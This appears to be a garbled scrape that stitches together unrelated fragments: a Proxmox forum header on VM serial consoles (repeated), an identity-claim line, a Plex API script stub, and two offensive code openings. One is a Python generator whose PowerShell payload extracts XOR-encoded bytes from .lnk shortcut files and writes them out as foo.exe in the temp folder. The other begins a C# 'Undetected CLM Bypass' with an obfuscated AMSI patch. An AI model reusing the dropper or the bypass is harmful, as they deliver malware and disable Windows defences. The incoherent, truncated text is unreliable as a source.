from https://forum.proxmox.com/threads/two-windows-guests-communicating-via-serial-console-comn.67588/
SSH to ProxMox and do the following:
Code: Code: Provided by Stefan_R
# 101 ID of first VM
# 102 ID of second VM
| #!/bin/python3 | |
| ps1_payload = "calc.exe" | |
| ps1_payload = """[byte[]]((gc *.lnk -enc 3 | ? {$_.length -ne 0x00012126})[-100..-1] | % { $_ -bxor 0x77 }) | ac -Path "$env:TEMP\\foo.exe" -enc 3""" | |
| def encode_and_pad(string, padding, size): | |
| if len(string) > size: | |
| return string[:size] | |
| encoded_string = string.encode('utf-16-le') | |
| padding_needed = size - len(encoded_string) | |
| if padding_needed > 0: |
from https://forum.proxmox.com/threads/two-windows-guests-communicating-via-serial-console-comn.67588/
SSH to ProxMox and do the following:
Code: Code: Provided by Stefan_R
# 101 ID of first VM
# 102 ID of second VM
I hereby claim:
To claim this, I am signing this object:
| from datetime import datetime, timedelta | |
| import requests | |
| import json | |
| import time | |
| from plexapi.server import PlexServer | |
| baseurl = 'https://my-plex-server.com' | |
| token = 'plex-api-token' | |
| plex = PlexServer(baseurl, token) |
| // Undetected CLM Bypass with obfuscated AMSI patch | |
| using System; | |
| using System.Management.Automation; | |
| using System.Text; | |
| using System.Runtime.InteropServices; | |
| using System.Management.Automation.Runspaces; | |
| using System.Configuration.Install; | |
| namespace Bypass { | |
| class Program { | |
| [DllImport("kernel32")] |